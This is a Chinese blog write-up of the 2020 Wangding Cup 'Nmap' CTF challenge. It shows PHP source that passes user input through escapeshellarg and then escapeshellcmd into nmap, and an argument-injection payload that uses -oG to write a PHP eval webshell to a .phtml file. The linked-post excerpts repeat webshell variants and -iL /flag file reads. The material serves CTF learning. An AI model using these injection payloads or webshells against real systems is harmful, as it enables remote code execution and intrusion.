[网鼎杯 2020 朱雀组]Nmap

最新推荐文章于 2022-04-05 15:33:39 发布
最新推荐文章于 2022-04-05 15:33:39 发布
阅读量98 收藏
点赞数
分类专栏: buu # web之每日一题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Shannidawang/article/details/119778314
版权

昨天写了一个差不多的题 online tool
这个题目就比较直观了属于是

源码

<?php
require('settings.php');

set_time_limit(0);
if (isset($_POST['host'])):
	if (!defined('WEB_SCANS')) {
        	die('Web scans disabled');
	}

	$host = $_POST['host'];
	if(stripos($host,'php')!==false){
		die("Hacker...");
	}
	$host = escapeshellarg($host);
	$host = escapeshellcmd($host);

	$filename = substr(md5(time() . rand(1, 10)), 0, 5);
	$command = "nmap ". NMAP_ARGS . " -oX " . RESULTS_PATH . $filename . " " . $host;
	$result_scan = shell_exec($command);
	if (is_null($result_scan)) {
		die('Something went wrong');
	} else {
		header('Location: result.php?f=' . $filename);
	}
else:
	....................
?>

PHP被过滤了

当Nmap使用参数 -oG时,能够将扫描的记录输出保存为.txt格式,而且其扫描记录当中一定会包括我们的扫描目标,我们利用这一点将webshell包含到我们指定的文本当中。

选项
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件

' <?=eval($_POST["1"]);?> -oG 1.phtml '
(闭合)  伪造主机地址(实际为webshell)  保存   闭合文本

访问buu/1.phtml
在这里插入图片描述
蚁剑连接 在根目录下找到flag

另外一种方法 对Nmap掌握较好可尝试

samh1777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网鼎杯-nmap
szgyunyun的博客
05-25 461
Web 0x01 nmap 查看源码提示: 研究了半天分隔符绕过,后来放弃了,根据题目提示(127.0.01,不用扫外网),尝试扫描/flag并尝试将其输出到1.txt中 -iL /flag -oN 1.txt 尝试失败之后继续尝试闭合一下 127.0.0.1' -iL /flag -oN szgyy.txt ' 传马 ' <?php @eval($_POST["mazi"]);?> -oG mazi.php ' ' <?= @eval($_POST["password"]);?&gt
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
用mimiktz和nmap进行网络扫描
06-15
《mimiktz和nmap在网络扫描中的应用》 网络安全是一项至关重要的任务,尤其是在现代数字化社会中。本文将深入探讨如何使用mimiktz和nmap这两种强大的工具来进行网络扫描,以获取目标主机的登录账号信息,并通过不同...
网络扫描工具-nmap与zmap
最新发布
12-28
本主题将深入探讨两种流行的网络扫描工具——nmap和zmap。 **nmap** nmap,全称为“Network Mapper”,是一款强大的开源网络探测和安全审计工具。它的主要功能包括: 1. **主机发现**:nmap通过发送特定的ICMP、...
nmap7.7.0,最新官网下载版本
01-19
最新下载的NMAP7.70,工具分享。使用更可靠更稳定。欢迎大家下载使用。
nmap nes脚本用法大全手记 网络攻防
01-24
500多个脚本用法详细说明和举例
[网鼎杯 2020 朱雀]Nmap 1
shinygod的博客
03-02 168
知识点:nmap的妙用 目录解题相关内容 解题 ' <?= @eval($_POST[a]); ?> -oG 1.phtml //' -oG 1.phtml <?= @eval($_POST[a]); ?> 进入1.phtml a=system("cat /flag"); 或者 ' -oN 2.phtml <?=eval($_POST["hack"]);?>' 进入1.phtml hack=system("cat /flag"); 或者 127.0.0.1' -iL
BUUCTF [网鼎杯 2020 朱雀] Nmap
Senimo
12-09 3603
BUUCTF [网鼎杯 2020 朱雀] Nmap 考点:nmap -oG 写入文件、-iL读取扫描文件 解法:将nmap扫描结果写入文件时加入一句话木马 启动环境: 类似Nmap的功能,一个输入命令行,提示输入ip地址,尝试输入正常内容:127.0.0.1 可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令 127.0.0.1 | ls 可以看到|被\转义,尝试使用;: 提示地址错误,尝试了一些其他的命令执行,也无法实现,参考 ...
web buuctf [网鼎杯 2020 朱雀]Nmap1
weixin_44214568的博客
04-05 1713
考点:namp注入 参考web buuctf [BUUCTF 2018]Online Tool1_半杯雨水敬过客的博客-CSDN博客 1. 2.利用NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 我们直接用那道buu里的payload: ' <?php eval($_POST["cmd"]);?> -oG zhuque.php ' 注入之后发现存在过滤,fuzz,过滤了php (1)利用<?=来代替.
2020网鼎杯朱雀WEB——NMAP&PHPWEB
Pdsdt1的博客
05-18 4162
NMAP 考察的是比较老的知识点了,在BUU出现过的题目,nmap命令行参数注入 详细文章: https://blog.csdn.net/qq_26406447/article/details/100711933 访问题目,发现我们可以输入url,经过nmap扫描后会返回出结果,这里引入nmap命令中的一个参数 -oG #可以实现将命令和结果写到文件 源码大概的构造: echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host); 我们可以通过
网鼎杯2020 web题 writeup
k851819815的博客
05-10 3157
AreUSerialz(反序列化) 题目源代码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile";
网鼎杯2020朱雀-web
ChenZIDu的博客
05-18 3014
nmap那题就基本命令然后还有一个别的方法。 nmap 源码 index.php <? require('settings.php'); set_time_limit(0); if (isset($_POST['host'])): if (!defined('WEB_SCANS')) { die('Web scans disabled'); } $host = $_POST['host']; if(stripos($host,'php')!==false){ di
【学习笔记 48】 buu [网鼎杯 2020 朱雀]Nmap
weixin_43553654的博客
08-11 684
0x00 知识点 NMAP中使用-0G命令可以实现代码写入 0x01 解题思路 打开网站一看发现是一个NMAP网站尝试输入输入任意ip 可以看到这里返回了nmap扫描的结果,这里我们就想到了NMAP里的-oG命令实现代码的写入,那我们这里就可以尝试构造payload,来利用‘拼接,写入我们想要的shell文件 ' <?php @eval($_POST["cmd"]);?> -oG shell.php ' 尝试后发现报错,说明这里有过滤不能直接进行,最后利用fuzz发现过滤了php,
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值